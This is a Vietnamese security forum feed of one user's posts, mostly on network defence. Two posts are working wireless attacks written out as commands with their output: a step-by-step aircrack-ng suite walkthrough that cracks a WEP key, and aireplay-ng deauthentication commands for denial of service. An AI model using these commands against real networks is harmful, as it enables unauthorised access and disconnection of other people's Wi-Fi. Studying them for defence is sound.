<![CDATA[Messages posted by "nhuhoang"]]> /hvaonline/posts/listByUser/144256.html JForum - http://www.jforum.net nhờ các cao thủ giúp đỡ về việc mất pass modem /hvaonline/posts/preList/44867/276968.html#276968 /hvaonline/posts/preList/44867/276968.html#276968 GMT Chống UDP Flood Attack

mylove14129 wrote:
Theo nhận định của mình thì có thể sv của bạn bị UDP flood vào port 3389( do bạn mở remote desktop)

nhuhoang wrote:
Giải pháp tốt nhất và có lẽ duy nhất là liên hệ với data center, đề nghị họ chặn toàn bộ gói tin UDP gửi đến địa chỉ server của bạn ấy, ngay tại router biên của data  
Giải pháp này khó mà thực hiện được, do trên sv của bạn 1412luv còn chạy một vài dịch vụ khác cần UDP( ex: game sv). Giải pháp của mình: 1. Không dùng remote desktop( cách này tốt nhất vì port 3389 thường xuyên bị tấn công, cả bruteforce) 2. Nếu vẫn dùng remote desktop. Mở cửa sổ cmd dưới quyền administrator gõ thêm command sau( Win server 2008): Code:
netsh advfirewall firewall add rule name="block_udp_3389" protocol=UDP localport = 3389 action=block dir=in
 
1. RDP cho win2k8 chỉ dùng TCP3389 chứ không dùng UDP3389 2. add thêm firewall rule vào windows trong trường hợp này cũng không có tác dụng gì bởi vì gói tin UDP đi đến server mới bị drop, trong lúc đấy thì network bandwidth đã full 100% rồi thì người dùng bt cũng không thể vào được. Đây là đòn hy sinh khi attacker có bandwidth bằng hoặc lớn hơn của victim Theo như mình quan sát trên hình thì server có IP 168.63.237.176 chính là nguồn gốc của cuộc tấn công, có location tại singapore, vậy thì mình đoán máy chủ của bạn 1412luv cũng không phải ở VN thì mới bị flush như vậy. Kiểu tấn công này nếu được thực hiện từ 1 số IP nhất định thì bạn chỉ cần thu thập các evidence rồi gửi cho DC bảo họ block đi là xong ]]>
/hvaonline/posts/preList/44792/276967.html#276967 /hvaonline/posts/preList/44792/276967.html#276967 GMT
Chống UDP Flood Attack

PXMMRF wrote:
Ngoài ra bạn 1412luv đã xoá IP tĩnh mà webserver của mình đang dùng trên WireShark cache, mà lại quên xoá hostname (hay computer name): ms-wxx-server. Hì hì.  
Cái ms-wxx-server đấy là dst port đấy chứ, IP dst thì bạn ấy đã xoá hết rồi Với kiểu tấn công này thì attacker làm flush network lên 100% nên nếu chặn ở server mình cũng không có nhiều tác dụng. Các router trung gian vẫn cho gói tin UDP đi qua và làm ngập đường truyền. Giải pháp tốt nhất và có lẽ duy nhất là liên hệ với data center, đề nghị họ chặn toàn bộ gói tin UDP gửi đến địa chỉ server của bạn ấy, ngay tại router biên của data center]]>
/hvaonline/posts/preList/44792/276951.html#276951 /hvaonline/posts/preList/44792/276951.html#276951 GMT
Đề nghị HVA quan tâm hơn đến mảng bảo mật cho thiết bị di động

conmale wrote:
Đề nghị này đã từng được đưa ra nhưng chưa thực hiện vì chưa thấy rõ nhu cầu. Nếu nhu cầu "mobile computing" thật sự đã cần thì có lẽ sẽ có một box "Mobile Computing" chứa hết tất cả mọi thứ về mobile device, kể cả jail break, bugs, bảo mật, thâm nhập cho mọi hệ điều hành. Nếu có nhu cầu tách rời từng loại ra thì tách sau. 
Phải suy nghĩ theo cách của Apple chứ anh, tạo ra xu hướng cho thị trường là chìa khoá dẫn đến thành công :P Trong khi cái này trên thế giới đã rất phát triển rồi, VN mình đã có gì đâu, chẳng qua nổi tiếng chỉ vì mấy bài hand on như đợt New iPad thôi Lúc đầu mới tạo em nghĩ sẽ có ít người tham gia, bởi vì hiện tại HVA phần nhiều quan tâm đến máy tính hơn, những người muốn nghiên cứu phát triển thì họ lại muốn sang tinhte hay gsm vì bên đấy có nhiều người để thảo luận, khen ngợi họ. Nên ngoài việc tạo ra sân chơi thì còn phải có 1 số lượng nhất định bài có giá trị trên diễn đàn, sau đấy làm cho mọi người biết đến thì mới có thể thu hút được. Vì vậy như anh tranvanminh nói thì phải có 1 dev team dịch/viết bài cho box nữa Em thì chỉ nêu ý tưởng thôi chứ hiện tại em không đủ thời gian để theo đam mê này, xin dành lại đất diễn cho các bạn trẻ :D]]>
/hvaonline/posts/preList/42210/262846.html#262846 /hvaonline/posts/preList/42210/262846.html#262846 GMT
Đề nghị HVA quan tâm hơn đến mảng bảo mật cho thiết bị di động
  • Android IOS Windows Phone Khác
  • hoặc chia theo chuyên mục:
    • Virus, trojan bảo mật thâm nhập bug+jailbreak
    Ngoài ra nếu có điều kiện thì HVA nên phát triển phiên bản web dành cho di động nữa hoặc kết hợp với tapatalk để vào qua mobile/tablet không cần browser ]]>
    /hvaonline/posts/preList/42210/262767.html#262767 /hvaonline/posts/preList/42210/262767.html#262767 GMT
    Cần giúp đỡ kiến thức về hệ thống an ninh mạng cho công ty Firewall Sử dụng appliance firewall, đừng tiết kiệm mà sử dụng software. Firewall trung tâm đóng vai trò rất quan trọng trong hệ thống, và nên sử dụng 1 cặp để dự phòng và share tải. Đối với hệ thống nhỏ và vừa thì có thể sử dụng các giải pháp của Juniper, Fortinet, hệ thống lớn hơn và nhiều tiền hơn thì dùng Checkpoint Proxy Windows server + ISA (bản "miễn phí") là sự lựa chọn không tồi nếu bạn chưa biết gì về linux, còn nếu rành rồi thì có thể dùng linux + squid. Còn nếu thừa rất nhiều tiền thì có thể dùng Bluecoat IDS/IPS Một hệ thống nhỏ và vừa thì có thể dùng tính năng tích hợp sẵn trong các firewall dòng UTM. Các firewall UTM này thậm chí còn có thêm cả các tính năng về url filtering, Anti-virus,... nhưng nhiều khi phải mua thêm license VPN Linux+OpenVPN là 1 giải pháp hay, không thì Windows Server (bản "miễn phí") cũng được Application firewall Thường thì với 1 hệ thống lớn người ta sẽ dùng các giải pháp về phần cứng bảo vệ cho toàn bộ website trong mạng, nhưng để tiết kiệm chi phí thì ta có thể sử dụng các giải pháp software như mod_security cài ngay trên web server. ]]> /hvaonline/posts/preList/38965/240858.html#240858 /hvaonline/posts/preList/38965/240858.html#240858 GMT Cách dò khóa WEP khi không có client nào kết nối đến access point

    nhanth87 wrote:
    Các AP đời sau này filmware của tụi nó đều được Harderning để chống fake authentication hoặc inject gói tin hết rồi nên cách naỳ nhiều khi không dùng được. 
    Chống injection bằng cách giới hạn packet/s thì còn được chứ fake authen thì chịu thôi bạn à. Có một trường hợp mà nhiều bạn nhầm lẫn là router được filter MAC thì các bạn không thể fake authen được mà vẫn phải dò cho đến khi có client kết nối vào rồi dùng macchanger, chứ không phải router có tính năng chống fake authen (chống thì loại luôn cả ng dùng hợp pháp rồi còn gì)]]>
    /hvaonline/posts/preList/33732/207683.html#207683 /hvaonline/posts/preList/33732/207683.html#207683 GMT
    HN tuyển chuyên viên,trưởng nhóm bảo mật-làm việc tại Ngân hàng TMCP /hvaonline/posts/preList/33183/207398.html#207398 /hvaonline/posts/preList/33183/207398.html#207398 GMT Ko kết nối đc với wifi (wifi ko có pass) /hvaonline/posts/preList/33603/207382.html#207382 /hvaonline/posts/preList/33603/207382.html#207382 GMT Cách dò khóa WEP khi không có client nào kết nối đến access point Code:
    [CH  7 ][ Elapsed: 3 mins ][ 2010-01-22 22:41
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:1E:E5:98:41:BE  -73      111      223    0  11  54 . WEP  WEP    OPN  delta
     00:0F:B3:3A:76:35  -76       36        0    0   9  54 . WEP  WEP         ACTIONTEC
     00:B0:0C:3E:12:3B  -82       72        0    0   6  54   OPN              TENDA
     00:B0:0C:05:1A:0A  -83       11        0    0   6  54   WPA2 CCMP   PSK  PhanBro
    
     BSSID              STATION            PWR   Rate    Lost  Packets  Probes
    
     00:1E:E5:98:41:BE  00:1D:0F:DF:E3:00    0    0 - 1      0      114
     00:1E:E5:98:41:BE  00:12:F0:CA:2B:BE   -1    1 - 0      0      359
     (not associated)   00:1F:E1:9C:98:17  -79    0 - 1      0       19  ZyXEL
     (not associated)   00:21:00:B7:DE:02  -81    0 - 1      0       19  vietdat
     (not associated)   00:16:EA:C6:16:62  -37    0 - 1      0       17
    Đầu tiên, sniff mạng ACTIONTEC vào file Code:
    airodump-ng wlan0 -c 9 --bssid 00:0F:B3:3A:76:35 -w actiontec
    
    CH  9 ][ Elapsed: 19 mins ][ 2010-01-22 23:02
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:0F:B3:3A:76:35  -81   0     4015        0    0   9  54 . WEP  WEP    OPN  ACTIONTEC
    
     BSSID              STATION            PWR   Rate    Lost  Packets  Probes
    Giả mạo làm một người dùng hợp pháp bằng tính năng fake authentication của aireplay-ng Code:
    aireplay-ng -1 10 -a 00:0F:B3:3A:76:35 wlan0 
    
    root@bt:~# aireplay-ng -1 10 -a 00:0F:B3:3A:76:35 wlan0
    No source MAC (-h) specified. Using the device MAC (00:1D:0F:DF:E3:00)
    22:43:11  Waiting for beacon frame (BSSID: 00:0F:B3:3A:76:35) on channel 9
    
    22:43:11  Sending Authentication Request (Open System) [ACK]
    22:43:11  Authentication successful
    22:43:11  Sending Association Request [ACK]
    22:43:11  Association successful :-) (AID: 1)
    22:43:21  Sending Authentication Request (Open System)
    Rình rập một chú “cừu non” đi lạc. Nguyên lý của cách tấn công này là tóm lấy 1 packet phù hợp từ accesspoint, sử dụng các thông số có trong packet này để tạo ra arp request. Tùy vào sự may mắn, bạn có thể phải chờ chương trình read vài ngàn gói tin mới có thể tìm được một gói tin ưng ý, gói tin này có chứa keystream. Code:
    root@bt:~# aireplay-ng -5 -b 00:0F:B3:3A:76:35 wlan0
    No source MAC (-h) specified. Using the device MAC (00:1D:0F:DF:E3:00)
    22:44:26  Waiting for beacon frame (BSSID: 00:0F:B3:3A:76:35) on channel 9
    22:44:26  Waiting for a data packet...
    Read 2233 packets...
    
            size: 386, FromDS: 1, ToDS: 0 (WEP)
    
                  BSSID  =  00:0F:B3:3A:76:35
              Dest. MAC  =  01:00:5E:7F:FF:FA
             Source MAC  =  00:0F:B3:3A:76:32
    
            0x0000:  0842 0000 0100 5e7f fffa 000f b33a 7635  
            0x0010:  000f b33a 7632 403f aa16 ea00 41a3 9c9c  
            0x0020:  fc66 2e21 4713 6d55 be7b b622 a5c8 47f1
            0x0030:  be1f 4cd4 c488 5d6c a4de 07e4 d815 88f4  
            0x0040:  75ae cce8 2092 854a 8101 73d4 77f4 2e80
            0x0050:  1321 0747 5aaa 8025 04a2 c65e a237 794e 
            0x0060:  556c f897 2f02 dab6 6a13 5967 c6a2 548e 
            0x0070:  ca0d bb21 326f 2abe 8afa aae5 9212 2ca9 
            0x0080:  1046 0084 0319 2b46 e651 6497 0c72 d1b1
            0x0090:  2335 ffc8 111c 152e 2b49 e222 a204 06ea 
            0x00a0:  5594 19b3 cebf 0eaf b295 d9de 6768 595a 
            0x00b0:  0eb5 f86f 4349 5d75 b650 34a2 61ed 2c42 
            0x00c0:  ce30 f519 bc72 57af 8367 bce6 d87f 3fd6 
            0x00d0:  7c42 fd6a 8dff 9384 a5df dfa0 292e 194a 
            --- CUT ---
    
    Use this packet ? y
    
    Saving chosen packet in replay_src-0122-224956.cap
    22:50:00  Data packet found!
    22:50:00  Sending fragmented packet
    22:50:00  Got RELAYED packet!!
    22:50:00  Trying to get 384 bytes of a keystream
    22:50:00  Not enough acks, repeating...
    22:50:00  Trying to get 384 bytes of a keystream
    22:50:00  Got RELAYED packet!!
    22:50:00  Trying to get 1500 bytes of a keystream
    22:50:00  Got RELAYED packet!!
    Saving keystream in fragment-0122-225000.xor
    Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
    Dùng packetforce-ng để chế biến ra một arp request hoàn toàn hợp lệ, giống như chú blackberry của mấy anh Hồ Cẩm Đào vậy Code:
    root@bt:~# packetforge-ng -0 -a 00:0F:B3:3A:76:35 -h 00:1D:0F:DF:E3:00 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0122-225000.xor -w arp-req
    
    Wrote packet to: arp-req
    Có đạn rồi thì cứ lắp vào súng máy mà bắn thôi Code:
    root@bt:~# aireplay-ng -2 -r arp-req wlan0
    No source MAC (-h) specified. Using the device MAC (00:1D:0F:DF:E3:00)
    
            size: 68, FromDS: 0, ToDS: 1 (WEP)
    
                  BSSID  =  00:0F:B3:3A:76:35
              Dest. MAC  =  FF:FF:FF:FF:FF:FF
             Source MAC  =  00:1D:0F:DF:E3:00
    
            0x0000:  0841 0201 000f b33a 7635 001d 0fdf e300 
            0x0010:  ffff ffff ffff 8001 06cc 8500 fdf0 b56b  
            0x0020:  aa0c d118 7897 55e7 c4c6 8806 6fca 10d9 
            0x0030:  2976 ea99 b1eb 35d6 097b 4702 72ec 4829 
            0x0040:  c854 6e25                               
    
    Use this packet ? y
    
    Saving chosen packet in replay_src-0122-230028.cap
    You should also start airodump-ng to capture replies.
    
    Send 4580 packets…(499pps)
    Quay lại airodump-ng xem lượng data tăng vùn vụt Code:
    [ CH  9 ][ Elapsed: 19 mins ][ 2010-01-22 23:02
    
     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     00:0F:B3:3A:76:35  -81   0     4015    25972  442   9  54 . WEP  WEP    OPN  ACTIONTEC
    
     BSSID              STATION            PWR   Rate    Lost  Packets  Probes
    
     00:0F:B3:3A:76:35  00:1D:0F:DF:E3:00    0    0 - 1      1    59304
    Với tốc độ 500pps thì chỉ cần 30s để phá wep 64 bit, còn wep 128 bit thì lâu hơn 20 lần, khoảng 10 phút Code:
    root@bt:~# aircrack-ng -a 1 actiontec-01.cap
    Opening actiontec-01.cap
    Read 53122 packets.
    
       #  BSSID              ESSID                     Encryption
    
       1  00:0F:B3:3A:76:35  ACTIONTEC                 WEP (12538 IVs)
    
    Choosing first network as target.
    
    Opening actiontec-01.cap
    Attack will be restarted every 5000 captured ivs.
    Starting PTW attack with 12633 ivs.
    
                                              Aircrack-ng 1.0 rc3 r1552
    
                              [00:01:33] Tested 775 keys (got 41314 IVs)
    
       KB    depth   byte(vote)
        0    1/  2   5E(52736) 95(49152) 49(48896) 46(48640) 65(48384) 67(48384) 99(48128)
        1   16/  1   B6(46336) C3(45824) 73(45568) C5(45568) DF(45568) 04(45056) 2A(45056)
        2    0/  3   33(57856) C2(50944) 4B(49920) 7E(49408) 0C(48896) 76(48128) 4F(47616)
        3    0/  6   44(56064) F3(51712) 24(49920) 31(48640) 57(48640) 2F(48384) 19(48128)
        4   41/  4   B6(44800) 03(44544) 4A(44544) 6A(44544) 91(44544) A3(44544) CD(44544)
    
                 KEY FOUND! [ 11:11:11:11:11:11:11:11:11:11:11:11:11 ]
            Decrypted correctly: 100%
    Ngoài ra còn một số cách nữa nhưng với bài viết này bạn có thể dò được đến 99% mạng wireless dùng WEP xung quanh, trừ những mạng xác thực bằng RADIUS (mà thực tế rất ít).]]>
    /hvaonline/posts/preList/33732/207381.html#207381 /hvaonline/posts/preList/33732/207381.html#207381 GMT
    Re: Ai giúp mình tìm phần mềm dò pass của wireless

    pigeroes wrote:
    Có nhiều phương pháp tùy theo loại card wifi của bạn, card chip càng xịn thì càng có nhiều khả năng crack. 
    Bạn nhầm to, xịn hay không tùy vào các công nghệ mà nó tích hợp, còn khả năng crack lại phụ thuộc vào loại chipset mà nó sử dụng. Một cái card atheros hiệu TP-Link chỉ khoảng 18$, tha hồ vọc. WPA crack hên xui, hên thì mất 1 phút còn xui thì never]]>
    /hvaonline/posts/preList/2083/162086.html#162086 /hvaonline/posts/preList/2083/162086.html#162086 GMT
    Re: Mấy anh kiểm tra giúp trang web này nó dùng shell gì Eror! Lang file is absent!  ]]> /hvaonline/posts/preList/26010/157883.html#157883 /hvaonline/posts/preList/26010/157883.html#157883 GMT Re: Dùng PQ Magic phân lại ổ, mất điện, dữ liệu bị mã hóa hết /hvaonline/posts/preList/26029/157881.html#157881 /hvaonline/posts/preList/26029/157881.html#157881 GMT cơ chế của việc tấn công DOS trong mạng wireless

    kenshin8x wrote:
    theo em hiểu cơ chế DOS trong mạng wireless là attacker sẽ gửi các gói tin giả dạng gói tin của AP đến các station kết nối vào AP làm cho station bị mất kết nối đến AP. (không biết có đúng không? :-S) bác nào biết về cái này giải thích hộ cái ;-)  
    Rất đơn giản. Bạn dùng gửi gói tin DeAthentication dạng broadcast hoặc unicast có bssid là MAC của Access Point (AP) thì các máy trạm (station) đang kết nối đến AP đó sẽ dính chưởng ngay bởi vì station không hề hỏi lại xem có đúng AP gửi không. Quá trình DeAuth là "không thể từ chối". Có thể tấn công dạng này bằng cách dùng aireplay-ng: Code:
    #aireplay-ng -0 1 -a <AP's MAC> ath0
    Hoặc
    #aireplay-ng -0 1 -a <AP's MAC> -c <station's MAC> ath0
    Nếu viết một script định kì 10s gửi gói tin DeAuth thì không một station nào có thể kết nối với AP. Mục đích Deny Of Services đã thành công]]>
    /hvaonline/posts/preList/25994/157880.html#157880 /hvaonline/posts/preList/25994/157880.html#157880 GMT
    Re: về việc thâm nhập mạng wifi với chip intell 3945 abg /hvaonline/posts/preList/14553/157877.html#157877 /hvaonline/posts/preList/14553/157877.html#157877 GMT Re: về việc thâm nhập mạng wifi với chip intell 3945 abg /hvaonline/posts/preList/14553/154005.html#154005 /hvaonline/posts/preList/14553/154005.html#154005 GMT Re: cho hỏi về report của firewall /hvaonline/posts/preList/24814/150362.html#150362 /hvaonline/posts/preList/24814/150362.html#150362 GMT Re: Cơ chế lưu mật khẩu của IE, Firefox /hvaonline/posts/preList/6137/150049.html#150049 /hvaonline/posts/preList/6137/150049.html#150049 GMT Re: Cài win cho nhiều máy cùng một lúc ? /hvaonline/posts/preList/24835/150045.html#150045 /hvaonline/posts/preList/24835/150045.html#150045 GMT Hướng dẫn cài đặt máy ảo trên windwos

    hongquan_cok wrote:
    Chào các bạn, mình đã đọc một số bài trong mục thâm nhập về truy nhập máy tính trên internet mình thấy khá hay nên cũng muốn thử. Tuy nhiên mình không muốn chọn một ip bất kì nào đó trên mạng để xâm nhập vì như vậy là xâm phạm và làm phiền họ. Liệu mình có thể cài đặt phầm mềm tạo máy ảo trên máy mình và tự thử truy nhập, kiểm soát máy mình được không. Nếu có thể mong các bạn cho mình chương trình và hướng dẫn sử dụng Thank! 
    Muốn xâm nhập máy tính thì dùng VMware được, còn xâm nhập modem thì phải làm "làm phiền" họ thôi :) Thực tế thì có một số trung tâm an ninh mạng thỉnh thoảng cũng "làm phiền" các ngân hàng đấy ]]>
    /hvaonline/posts/preList/24799/150018.html#150018 /hvaonline/posts/preList/24799/150018.html#150018 GMT
    Re: cho hỏi về report của firewall /hvaonline/posts/preList/24814/149922.html#149922 /hvaonline/posts/preList/24814/149922.html#149922 GMT Re: Windows XP không tạo được kết nối VPN /hvaonline/posts/preList/24801/149917.html#149917 /hvaonline/posts/preList/24801/149917.html#149917 GMT Re: Không thể truy cập FTP server từ internet! /hvaonline/posts/preList/24484/149874.html#149874 /hvaonline/posts/preList/24484/149874.html#149874 GMT Web Hostin

    GhostRider wrote:
    Các bác cho em hỏi chút! Giữa dịch vụ mail trên web-hosting và mail trên Email Server thì loại nào tốt hơn, ổn định, nhanh hơn? Em đang phân vân dịch vụ mail giữa Web hosting và Email Server để sử dụng! Mong các bác cho lời khuyên!  
    Cần phải cân đối giữa nhu cầu và tài chính. Nếu bạn phục vụ mail cho vài trăm người thì nên làm một mail server riêng, còn nếu ít thì tích hợp luôn vào hosting server. Một mail server không cần quá chú ý đến tốc độ, delay vài phút cũng không ảnh hưởng gì cả. Chú ý không cấu hình open relay và nên giới hạn số mail/account/phút]]>
    /hvaonline/posts/preList/24751/149872.html#149872 /hvaonline/posts/preList/24751/149872.html#149872 GMT
    Re: HIDS có chức năng Port Scan Detector

    lehong wrote:
    Sao chẳng có ai help em hết! Chủ đề của em cũng tương đối hot mà sao chẳng có ai ý kiến giúp em hết? 
    vậy bạn định lập trình IDS mới hoàn toàn hay base trên hidsbyavinash? Mình cũng có ý định làm đồ án về IPS, nhưng không theo hướng lậpt trình mà chỉ xây dựng các giải pháp dựa trên IDS có sẵn, có gì trao đổi cái nhỉ :)]]>
    /hvaonline/posts/preList/24489/149871.html#149871 /hvaonline/posts/preList/24489/149871.html#149871 GMT
    Windows XP không tạo được kết nối VPN
    ]]>
    /hvaonline/posts/preList/24801/149864.html#149864 /hvaonline/posts/preList/24801/149864.html#149864 GMT
    Re: Hỏi về MAC,DAC,RBAC /hvaonline/posts/preList/6755/138333.html#138333 /hvaonline/posts/preList/6755/138333.html#138333 GMT